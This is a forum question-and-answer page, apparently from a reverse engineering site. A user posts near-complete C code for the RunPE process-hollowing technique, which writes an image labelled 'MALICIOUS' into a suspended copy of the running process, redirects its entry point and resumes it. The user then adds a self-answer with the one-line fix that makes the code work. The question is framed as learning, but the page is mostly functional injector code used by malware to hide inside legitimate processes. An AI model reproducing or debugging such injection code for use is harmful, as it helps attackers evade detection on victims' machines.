Reverse Engineering Asked by Mohannad Raafat on July 19, 2021
I’m trying to use RunPE technique (For learning).
First, I tried it on Windows XP(32-bit) and no error occurs but, the injected code for(HelloWorld) didn’t run.
Then, I tried to use it on Windows 7 and 10 (64-bit) and get this error[0xc00000005] when the thread resumed.
Why I get this error and why the injected code didn’t run on the XP machine?
I tried also to unmap the imagebase(0x00400000) but I had the same problem.
my code:
int runPe(void* image) {
IMAGE_DOS_HEADER* dosHeader;
IMAGE_NT_HEADERS* ntHeader;
IMAGE_SECTION_HEADER* sectionHeader;
CONTEXT* ctx;
PROCESS_INFORMATION pinfo;
STARTUPINFO sinfo;
int i;
DWORD* ImageBase = NULL;
void* pImage = NULL;
char currentpath[1024];
GetModuleFileNameA(0, currentpath, 1024); //path to the current exe
//Identifying the MALICIOUS IMAGE HEADERS
dosHeader = (PIMAGE_DOS_HEADER)(image);
ntHeader = (PIMAGE_NT_HEADERS)((DWORD)image + dosHeader->e_lfanew);
//Checks if this is a PE FILE
if (ntHeader->Signature == IMAGE_NT_SIGNATURE) {
ZeroMemory(&pinfo, sizeof(pinfo));
ZeroMemory(&sinfo, sizeof(sinfo));
if (CreateProcessA(currentpath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &sinfo, &pinfo)) {
printf("[*] Suspended process is createdn");
Sleep(600);
//Allocate memory for the context of suspended process
ctx = (LPCONTEXT)(VirtualAlloc(NULL, sizeof(ctx), MEM_COMMIT, PAGE_READWRITE));
if (ctx) {
ctx->ContextFlags = CONTEXT_FULL;
printf("[*] Context is allocated successfullyn");
Sleep(600);
//Get the thread context
if (GetThreadContext(pinfo.hThread, (LPCONTEXT)ctx)) {
printf("[*] Allocating MALICIOUS image headers into the suspended processn");
Sleep(600);
ReadProcessMemory(pinfo.hProcess,(LPCVOID)(ctx->Ebx + 8), (LPVOID)(&ImageBase), 4, 0);
pImage = VirtualAllocEx(pinfo.hProcess, NULL,
ntHeader->OptionalHeader.SizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (pImage) {
printf("[*] Allocating memory for MALICIOUS image headers into the IMAGE_BASEn");
Sleep(600);
//Writing the image intor the process address space
if (WriteProcessMemory(pinfo.hProcess, (LPVOID)pImage, image, ntHeader->OptionalHeader.SizeOfHeaders, NULL)) {
printf("[*] Writing memory for MALICIOUS image headers into the IMAGE_BASEn");
Sleep(600);
//sectionHeader = (PIMAGE_SECTION_HEADER)((DWORD)image + dosHeader->e_lfanew + sizeof(IMAGE_NT_HEADERS));
for (i = 0; i < ntHeader->FileHeader.NumberOfSections; i++)
{
sectionHeader = (PIMAGE_SECTION_HEADER)((DWORD)image + dosHeader->e_lfanew + 248 + (i * sizeof(IMAGE_SECTION_HEADER)));
if (sectionHeader->SizeOfRawData == 00000000)
continue;
if (WriteProcessMemory(pinfo.hProcess, (LPVOID)((DWORD)(pImage) + sectionHeader->VirtualAddress),
(LPVOID)((DWORD)image + sectionHeader->PointerToRawData), sectionHeader->SizeOfRawData, 0))
{
printf("[*] Allocating memory for Section %d at %Xn", i, (LPVOID)((DWORD)pImage + sectionHeader->VirtualAddress));
Sleep(600);
}
else
{
printf("ERROR: Writing section (%d) into memory failedn", i);
printf("Error Code: %dn", GetLastError());
return -1;
}
}
//Change the imageBase address from the suspened process into the MALICIOUS
if (WriteProcessMemory(pinfo.hProcess, (LPVOID)(ctx->Ebx + 8), (LPVOID)(ntHeader->OptionalHeader.ImageBase), 4, 0)) {
printf("[*] Image base address is changed to MALICIOUSn");
Sleep(600);
//Now we will move the address of entrypoint to the MALCIOUS image
// At EAX register
ctx->Eax = (DWORD)pImage + ntHeader->OptionalHeader.AddressOfEntryPoint;
printf("[*] AddressOfEntryPoint is changed to MALICIOUSn");
Sleep(600);
//Set Thread Context and resume it
SetThreadContext(pinfo.hProcess, (LPCONTEXT)ctx);
ResumeThread(pinfo.hThread);
printf("[*] Thread is resumedn");
}
else
{
printf("ERROR: Change the imageBase address from the suspened process into the MALICIOUS failedn");
printf("Error Code: %dn", GetLastError());
return -1;
}
}
else
{
printf("ERROR: Writing the image into the process address space failedn");
printf("Error Code: %dn", GetLastError());
return -1;
}
}
else
{
printf("ERROR: Allocating memory for MALICIOUS image headers into the IMAGE_BASE failedn");
printf("Error Code: %dn", GetLastError());
return -1;
}
}
else
{
printf("ERROR: GetThreadContext failedn");
printf("Error Code: %dn", GetLastError());
return -1;
}
}
else
{
printf("ERROR: Context allocation failedn");
printf("Error Code: %dn", GetLastError());
return -1;
}
}
return 0;
}
else
{
printf("ERROR: Invalid nt SIGNATUREn");
printf("Error Code: %dn", GetLastError());
return -1;
}
}
SOLVED:
I must pass the address of the buffer not the value inside that buffer in WriteProcessMemmory [Call by reference]
Modified:
WriteProcessMemory(pinfo.hProcess, (LPVOID)(ctx->Ebx + 8), (LPVOID)(&ntHeader->OptionalHeader.ImageBase), 4, 0)
Correct answer by Mohannad Raafat on July 19, 2021
Get help from others!
Recent Answers
Recent Questions
© 2024 TransWikia.com. All rights reserved. Sites we Love: PCI Database, UKBizDB, Menu Kuliner, Sharing RPP